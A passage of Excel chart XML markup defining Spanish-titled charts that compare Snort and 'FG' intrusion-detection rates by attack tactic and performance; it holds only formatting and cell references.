            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$H$16:$U$16</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$AT$15:$BE$15</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1282955022"/>
        <c:axId val="1219708387"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="1282955022"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Concepto/Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1219708387"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1219708387"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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Flujos con Ataque Totales Detectados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282955022"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart10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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>Categorización de Ataques - LV1 vs LV2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="B7B7B7"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$D$124:$D$125</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$E$124:$E$125</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:holeSize val="50"/>
      </c:doughnutChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart104.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>TÁCTICAS / TÉCNICAS / SUBTÉCNICAS DETECTABLES POR RED CUBIERTAS</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="990000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$F$152:$F$154</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$G$152:$G$154</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="191372889"/>
        <c:axId val="834182661"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="191372889"/>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834182661"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="834182661"/>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91372889"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart105.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ FLUJOS - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="2"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="3C78D8"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$235:$K$239</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$235:$L$239</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="354149591"/>
        <c:axId val="695003247"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="354149591"/>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695003247"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="695003247"/>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354149591"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart106.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos por Táctica - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$265</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$266:$K$279</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$266:$L$279</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$265</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$266:$K$279</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$266:$M$279</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1005518463"/>
        <c:axId val="1101453531"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1005518463"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1101453531"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1101453531"/>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005518463"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart107.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ ATAQUES - Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="4"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$316:$K$320</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$316:$L$320</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1924636138"/>
        <c:axId val="530231583"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1924636138"/>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530231583"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="530231583"/>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924636138"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart108.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% PROMEDIO DETECCIÓN EFICAZ ATAQUES POR TÁCTICA - Snort VS FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$355</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$356:$K$369</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$356:$L$369</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$355</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$356:$K$369</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$M$356:$M$369</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="958736498"/>
        <c:axId val="1930377162"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="958736498"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1930377162"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1930377162"/>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958736498"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart109.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>RENDIMIENTO Snort vs FG</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$414</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="1800">
                    <a:latin typeface="Roboto"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$415:$K$419</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$415:$L$419</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1865141969"/>
        <c:axId val="2145079479"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="1865141969"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>IDS</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="2145079479"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2145079479"/>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Rendimiento</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865141969"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart110.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>COMPARATIVA GENERAL - DETECCIÓN EFICAZ ATAQUES</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$453</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="4285F4"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="4285F4"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$452:$P$452</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$453:$P$453</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$454</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="EA4335"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="EA4335"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$452:$P$452</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$454:$P$454</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$K$455</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln cmpd="sng" w="38100">
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="FBBC04"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FBBC04"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$452:$P$452</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados IV - '!$L$455:$P$455</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="828425003"/>
        <c:axId val="74237477"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="828425003"/>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74237477"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="74237477"/>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828425003"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart11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1F1F1F"/>
                </a:solidFill>
